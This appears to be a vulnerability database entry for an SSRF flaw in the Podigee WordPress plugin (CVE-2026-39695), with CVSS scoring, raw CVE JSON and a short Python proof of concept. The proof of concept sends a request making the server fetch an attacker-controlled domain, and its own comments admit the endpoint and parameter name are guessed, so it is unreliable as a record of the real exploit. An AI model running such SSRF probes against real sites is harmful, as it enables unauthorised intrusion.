Security Vulnerability Report
中文
CVE-2026-39695 CVSS 5.4 MEDIUM

CVE-2026-39695

Published: 2026-04-08 09:16:42
Last Modified: 2026-04-24 18:05:36

Description

Server-Side Request Forgery (SSRF) vulnerability in podigee Podigee podigee allows Server Side Request Forgery.This issue affects Podigee: from n/a through <= 1.4.0.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Podigee <= 1.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# This is a generic PoC for SSRF demonstration. Actual endpoint requires specific analysis. import requests def check_ssrf(target_url, malicious_url): """Send a payload to the vulnerable endpoint.""" # Hypothetical endpoint based on typical plugin behavior payload = { "feed_url": malicious_url # Parameter name is hypothetical } try: response = requests.post(target_url, data=payload, timeout=10) if response.status_code == 200: print(f"[+] Potential SSRF triggered. Server responded with length: {len(response.text)}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": target = "http://example.com/wp-admin/admin-ajax.php" # Placeholder # Using a canary token or burp collaborator to detect out-of-band interaction check_ssrf(target, "http://attacker-controlled-domain.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39695", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:41.910", "lastModified": "2026-04-24T18:05:35.730", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in podigee Podigee podigee allows Server Side Request Forgery.This issue affects Podigee: from n/a through <= 1.4.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/podigee/vulnerability/wordpress-podigee-plugin-1-4-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}